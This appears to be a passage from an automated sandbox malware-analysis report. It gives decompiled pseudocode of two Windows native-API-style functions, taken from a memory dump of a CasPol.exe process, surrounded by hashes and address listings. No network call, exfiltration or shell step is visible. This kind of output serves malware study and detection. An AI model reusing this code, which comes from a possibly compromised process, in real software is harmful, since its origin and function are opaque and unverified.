                                                                                                                                                                                                                                                                                                0x01796f23
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796f28
                                                                                                                                                                                                                                                                                                0x01755204
                                                                                                                                                                                                                                                                                                0x01755204
                                                                                                                                                                                                                                                                                                0x01755208
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01755208
                                                                                                                                                                                                                                                                                                0x01755185
                                                                                                                                                                                                                                                                                                0x01755188
                                                                                                                                                                                                                                                                                                0x0175518a
                                                                                                                                                                                                                                                                                                0x0175518e
                                                                                                                                                                                                                                                                                                0x01755195
                                                                                                                                                                                                                                                                                                0x01796db1
                                                                                                                                                                                                                                                                                                0x01796db5
                                                                                                                                                                                                                                                                                                0x01796db9
                                                                                                                                                                                                                                                                                                0x0175519b
                                                                                                                                                                                                                                                                                                0x0175519b
                                                                                                                                                                                                                                                                                                0x0175519e
                                                                                                                                                                                                                                                                                                0x017551a7
                                                                                                                                                                                                                                                                                                0x017551a9
                                                                                                                                                                                                                                                                                                0x017551a9
                                                                                                                                                                                                                                                                                                0x017551b5
                                                                                                                                                                                                                                                                                                0x017551b8
                                                                                                                                                                                                                                                                                                0x017551bb
                                                                                                                                                                                                                                                                                                0x017551be
                                                                                                                                                                                                                                                                                                0x017551c1
                                                                                                                                                                                                                                                                                                0x017551c5
                                                                                                                                                                                                                                                                                                0x017551c9
                                                                                                                                                                                                                                                                                                0x017551cd
                                                                                                                                                                                                                                                                                                0x017551cd
                                                                                                                                                                                                                                                                                                0x017551d8
                                                                                                                                                                                                                                                                                                0x017551dc
                                                                                                                                                                                                                                                                                                0x017551e0
                                                                                                                                                                                                                                                                                                0x01796dcc
                                                                                                                                                                                                                                                                                                0x01796dd0
                                                                                                                                                                                                                                                                                                0x01796dd5
                                                                                                                                                                                                                                                                                                0x01796ddd
                                                                                                                                                                                                                                                                                                0x01796de1
                                                                                                                                                                                                                                                                                                0x01796de1
                                                                                                                                                                                                                                                                                                0x01796de5
                                                                                                                                                                                                                                                                                                0x01796deb
                                                                                                                                                                                                                                                                                                0x01796df1
                                                                                                                                                                                                                                                                                                0x01796df7
                                                                                                                                                                                                                                                                                                0x01796dfd
                                                                                                                                                                                                                                                                                                0x01796e01
                                                                                                                                                                                                                                                                                                0x01796e05
                                                                                                                                                                                                                                                                                                0x01796e09
                                                                                                                                                                                                                                                                                                0x01796e0d
                                                                                                                                                                                                                                                                                                0x01796e11
                                                                                                                                                                                                                                                                                                0x01796e11
                                                                                                                                                                                                                                                                                                0x017551eb
                                                                                                                                                                                                                                                                                                0x01796e1a
                                                                                                                                                                                                                                                                                                0x01796e1f
                                                                                                                                                                                                                                                                                                0x01796e21
                                                                                                                                                                                                                                                                                                0x01796e23
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017551f1
                                                                                                                                                                                                                                                                                                0x017551f1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017551f1

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd05ad96a494238ffc821e370c925f66b9670288e697983264a562d01c721c96
                                                                                                                                                                                                                                                                                                • Instruction ID: 01e682d899ea4935a3fb40d3121c18e87fb2065e74582e28809a9dfd5759e552
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd05ad96a494238ffc821e370c925f66b9670288e697983264a562d01c721c96
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48C112B55083818FD755CF28C580A5AFBF1BF88304F188A6EF9998B352D771E985CB42
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017503E2 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                                			E017503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x181d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01750548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L0176B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0173B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1817c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01747D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01747D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E017A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01769830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1817c04 != 0) {
						_t118 = _v12;
						_t120 = L017AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1817bd8;
						if( *0x1817bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E017A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0172B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0176AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1818474 - 3;
										if( *0x1818474 != 3) {
											 *0x18179dc =  *0x18179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01747D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01747D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E017A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1818708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1817b00; // 0x0
							asm("ror esi, cl");
							 *0x181b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L01737F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                                                                                                                                                                                                0x017503f1
                                                                                                                                                                                                                                                                                                0x017503f7
                                                                                                                                                                                                                                                                                                0x017503f9
                                                                                                                                                                                                                                                                                                0x017503fb
                                                                                                                                                                                                                                                                                                0x017503fd
                                                                                                                                                                                                                                                                                                0x01750400
                                                                                                                                                                                                                                                                                                0x0175040a
                                                                                                                                                                                                                                                                                                0x01794c7a
                                                                                                                                                                                                                                                                                                0x01750537
                                                                                                                                                                                                                                                                                                0x01750547
                                                                                                                                                                                                                                                                                                0x01750410
                                                                                                                                                                                                                                                                                                0x01750410
                                                                                                                                                                                                                                                                                                0x01750414
                                                                                                                                                                                                                                                                                                0x01750417
                                                                                                                                                                                                                                                                                                0x0175041a
                                                                                                                                                                                                                                                                                                0x01750421
                                                                                                                                                                                                                                                                                                0x01750424
                                                                                                                                                                                                                                                                                                0x0175042b
                                                                                                                                                                                                                                                                                                0x0175043b
                                                                                                                                                                                                                                                                                                0x0175043e
                                                                                                                                                                                                                                                                                                0x0175043f
                                                                                                                                                                                                                                                                                                0x0175043f
                                                                                                                                                                                                                                                                                                0x01750446
                                                                                                                                                                                                                                                                                                0x01750449
                                                                                                                                                                                                                                                                                                0x0175044c
                                                                                                                                                                                                                                                                                                0x0175044f
                                                                                                                                                                                                                                                                                                0x01750459
                                                                                                                                                                                                                                                                                                0x01794c8d
                                                                                                                                                                                                                                                                                                0x0175045f
                                                                                                                                                                                                                                                                                                0x0175045f
                                                                                                                                                                                                                                                                                                0x0175045f
                                                                                                                                                                                                                                                                                                0x01750467
                                                                                                                                                                                                                                                                                                0x01794c97
                                                                                                                                                                                                                                                                                                0x01794c9d
                                                                                                                                                                                                                                                                                                0x01794ca4
                                                                                                                                                                                                                                                                                                0x01794caa
                                                                                                                                                                                                                                                                                                0x01794caf
                                                                                                                                                                                                                                                                                                0x01794cb1
                                                                                                                                                                                                                                                                                                0x01794cc3
                                                                                                                                                                                                                                                                                                0x01794cb3
                                                                                                                                                                                                                                                                                                0x01794cbc
                                                                                                                                                                                                                                                                                                0x01794cbc
                                                                                                                                                                                                                                                                                                0x01794cc8
                                                                                                                                                                                                                                                                                                0x01794ccb
                                                                                                                                                                                                                                                                                                0x01794cd7
                                                                                                                                                                                                                                                                                                0x01794cda
                                                                                                                                                                                                                                                                                                0x01794cdf
                                                                                                                                                                                                                                                                                                0x01794cdf
                                                                                                                                                                                                                                                                                                0x01794ccb
                                                                                                                                                                                                                                                                                                0x01794ca4
                                                                                                                                                                                                                                                                                                0x0175046d
                                                                                                                                                                                                                                                                                                0x0175046f
                                                                                                                                                                                                                                                                                                0x0175046f
                                                                                                                                                                                                                                                                                                0x01750471
                                                                                                                                                                                                                                                                                                0x01750476
                                                                                                                                                                                                                                                                                                0x0175047a
                                                                                                                                                                                                                                                                                                0x0175047b
                                                                                                                                                                                                                                                                                                0x01750483
                                                                                                                                                                                                                                                                                                0x01750489
                                                                                                                                                                                                                                                                                                0x0175048d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794ce9
                                                                                                                                                                                                                                                                                                0x01794cef
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x01794cf1
                                                                                                                                                                                                                                                                                                0x01794cf7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794cf9
                                                                                                                                                                                                                                                                                                0x01794cff
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d05
                                                                                                                                                                                                                                                                                                0x01794d07
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d0d
                                                                                                                                                                                                                                                                                                0x01794d0f
                                                                                                                                                                                                                                                                                                0x01794d14
                                                                                                                                                                                                                                                                                                0x01794d16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d1c
                                                                                                                                                                                                                                                                                                0x01794d1c
                                                                                                                                                                                                                                                                                                0x01750499
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x017504a6
                                                                                                                                                                                                                                                                                                0x01794d2c
                                                                                                                                                                                                                                                                                                0x01794d37
                                                                                                                                                                                                                                                                                                0x01794d39
                                                                                                                                                                                                                                                                                                0x01794d3b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d41
                                                                                                                                                                                                                                                                                                0x01794d48
                                                                                                                                                                                                                                                                                                0x01750527
                                                                                                                                                                                                                                                                                                0x0175052b
                                                                                                                                                                                                                                                                                                0x0175052d
                                                                                                                                                                                                                                                                                                0x01750530
                                                                                                                                                                                                                                                                                                0x01750530
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175052b
                                                                                                                                                                                                                                                                                                0x01794d4e
                                                                                                                                                                                                                                                                                                0x017504ac
                                                                                                                                                                                                                                                                                                0x017504ac
                                                                                                                                                                                                                                                                                                0x017504af
                                                                                                                                                                                                                                                                                                0x017504b2
                                                                                                                                                                                                                                                                                                0x017504b7
                                                                                                                                                                                                                                                                                                0x017504b9
                                                                                                                                                                                                                                                                                                0x017504bb
                                                                                                                                                                                                                                                                                                0x017504bd
                                                                                                                                                                                                                                                                                                0x017504bf
                                                                                                                                                                                                                                                                                                0x017504c5
                                                                                                                                                                                                                                                                                                0x017504c9
                                                                                                                                                                                                                                                                                                0x01794d53
                                                                                                                                                                                                                                                                                                0x01794d59
                                                                                                                                                                                                                                                                                                0x01794db9
                                                                                                                                                                                                                                                                                                0x01794dba
                                                                                                                                                                                                                                                                                                0x01794dbf
                                                                                                                                                                                                                                                                                                0x01794dc2
                                                                                                                                                                                                                                                                                                0x01794dc4
                                                                                                                                                                                                                                                                                                0x01794dc7
                                                                                                                                                                                                                                                                                                0x01794dce
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794dce
                                                                                                                                                                                                                                                                                                0x01794d5b
                                                                                                                                                                                                                                                                                                0x01794d61
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d63
                                                                                                                                                                                                                                                                                                0x01794d69
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d6b
                                                                                                                                                                                                                                                                                                0x01794d6e
                                                                                                                                                                                                                                                                                                0x01794d74
                                                                                                                                                                                                                                                                                                0x01794d76
                                                                                                                                                                                                                                                                                                0x01794d7c
                                                                                                                                                                                                                                                                                                0x01794d7e
                                                                                                                                                                                                                                                                                                0x01794d84
                                                                                                                                                                                                                                                                                                0x01794d89
                                                                                                                                                                                                                                                                                                0x01794d8c
                                                                                                                                                                                                                                                                                                0x01794d8d
                                                                                                                                                                                                                                                                                                0x01794d92
                                                                                                                                                                                                                                                                                                0x01794d95
                                                                                                                                                                                                                                                                                                0x01794d96
                                                                                                                                                                                                                                                                                                0x01794d98
                                                                                                                                                                                                                                                                                                0x01794d9a
                                                                                                                                                                                                                                                                                                0x01794d9f
                                                                                                                                                                                                                                                                                                0x01794da4
                                                                                                                                                                                                                                                                                                0x01794da6
                                                                                                                                                                                                                                                                                                0x01794da8
                                                                                                                                                                                                                                                                                                0x01794daf
                                                                                                                                                                                                                                                                                                0x01794db1
                                                                                                                                                                                                                                                                                                0x01794db1
                                                                                                                                                                                                                                                                                                0x01794daf
                                                                                                                                                                                                                                                                                                0x01794da6
                                                                                                                                                                                                                                                                                                0x01794d84
                                                                                                                                                                                                                                                                                                0x01794d7c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d74
                                                                                                                                                                                                                                                                                                0x017504d6
                                                                                                                                                                                                                                                                                                0x01794de1
                                                                                                                                                                                                                                                                                                0x017504dc
                                                                                                                                                                                                                                                                                                0x017504dc
                                                                                                                                                                                                                                                                                                0x017504dc
                                                                                                                                                                                                                                                                                                0x017504e4
                                                                                                                                                                                                                                                                                                0x01794deb
                                                                                                                                                                                                                                                                                                0x01794df1
                                                                                                                                                                                                                                                                                                0x01794df8
                                                                                                                                                                                                                                                                                                0x01794dfe
                                                                                                                                                                                                                                                                                                0x01794e03
                                                                                                                                                                                                                                                                                                0x01794e05
                                                                                                                                                                                                                                                                                                0x01794e17
                                                                                                                                                                                                                                                                                                0x01794e07
                                                                                                                                                                                                                                                                                                0x01794e10
                                                                                                                                                                                                                                                                                                0x01794e10
                                                                                                                                                                                                                                                                                                0x01794e1c
                                                                                                                                                                                                                                                                                                0x01794e1f
                                                                                                                                                                                                                                                                                                0x01794e35
                                                                                                                                                                                                                                                                                                0x01794e35
                                                                                                                                                                                                                                                                                                0x01794e1f
                                                                                                                                                                                                                                                                                                0x01794df8
                                                                                                                                                                                                                                                                                                0x017504f1
                                                                                                                                                                                                                                                                                                0x017504fa
                                                                                                                                                                                                                                                                                                0x01794e3f
                                                                                                                                                                                                                                                                                                0x01794e47
                                                                                                                                                                                                                                                                                                0x01794e5b
                                                                                                                                                                                                                                                                                                0x01794e61
                                                                                                                                                                                                                                                                                                0x01794e67
                                                                                                                                                                                                                                                                                                0x01794e69
                                                                                                                                                                                                                                                                                                0x01794e71
                                                                                                                                                                                                                                                                                                0x01794e73
                                                                                                                                                                                                                                                                                                0x01750500
                                                                                                                                                                                                                                                                                                0x01750500
                                                                                                                                                                                                                                                                                                0x01750500
                                                                                                                                                                                                                                                                                                0x017504fa
                                                                                                                                                                                                                                                                                                0x01750508
                                                                                                                                                                                                                                                                                                0x0175051d
                                                                                                                                                                                                                                                                                                0x0175051d
                                                                                                                                                                                                                                                                                                0x0175051f
                                                                                                                                                                                                                                                                                                0x01750524
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01750524
                                                                                                                                                                                                                                                                                                0x01750515
                                                                                                                                                                                                                                                                                                0x01750517
                                                                                                                                                                                                                                                                                                0x01794e7a
                                                                                                                                                                                                                                                                                                0x01794e7c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794e85
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794e85
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01750517

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c9ed41537d89887946bd09853b822247da5ed387e08664f6e94ce4cf4c2af892
                                                                                                                                                                                                                                                                                                • Instruction ID: a7ca02d11cc5281ab6277e23a58a977d455edbf93e27b9f190be1ab529bfd063
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9ed41537d89887946bd09853b822247da5ed387e08664f6e94ce4cf4c2af892
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81918831E00255AFEF328B6CD948BADFFA4AB02724F150265FE11AB2D1D7B49D45CB81
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017BB8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 39%
                                                                                                                                                                                                                                                                                                			E017BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1817b9c; // 0x0
				_t124 = L01744620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01769800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									L017695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01769910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1817b9c; // 0x0
									_t92 = L01744620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01769910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L0172A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L017BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L017BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						L017695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                                                                                                                                                                                                0x017bb8d9
                                                                                                                                                                                                                                                                                                0x017bb8e4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb8e6
                                                                                                                                                                                                                                                                                                0x017bb8f3
                                                                                                                                                                                                                                                                                                0x017bb8f5
                                                                                                                                                                                                                                                                                                0x017bb8f5
                                                                                                                                                                                                                                                                                                0x017bb8f8
                                                                                                                                                                                                                                                                                                0x017bb920
                                                                                                                                                                                                                                                                                                0x017bb924
                                                                                                                                                                                                                                                                                                0x017bb936
                                                                                                                                                                                                                                                                                                0x017bb939
                                                                                                                                                                                                                                                                                                0x017bb93d
                                                                                                                                                                                                                                                                                                0x017bb948
                                                                                                                                                                                                                                                                                                0x017bb9a0
                                                                                                                                                                                                                                                                                                0x017bb9a0
                                                                                                                                                                                                                                                                                                0x017bb9a4
                                                                                                                                                                                                                                                                                                0x017bb9bf
                                                                                                                                                                                                                                                                                                0x017bb9c4
                                                                                                                                                                                                                                                                                                0x017bb9c6
                                                                                                                                                                                                                                                                                                0x017bb9cd
                                                                                                                                                                                                                                                                                                0x017bb9d1
                                                                                                                                                                                                                                                                                                0x017bbad4
                                                                                                                                                                                                                                                                                                0x017bbad8
                                                                                                                                                                                                                                                                                                0x017bbada
                                                                                                                                                                                                                                                                                                0x017bbadc
                                                                                                                                                                                                                                                                                                0x017bbadc
                                                                                                                                                                                                                                                                                                0x017bbadf
                                                                                                                                                                                                                                                                                                0x017bbae0
                                                                                                                                                                                                                                                                                                0x017bbae2
                                                                                                                                                                                                                                                                                                0x017bbae4
                                                                                                                                                                                                                                                                                                0x017bbaec
                                                                                                                                                                                                                                                                                                0x017bbaee
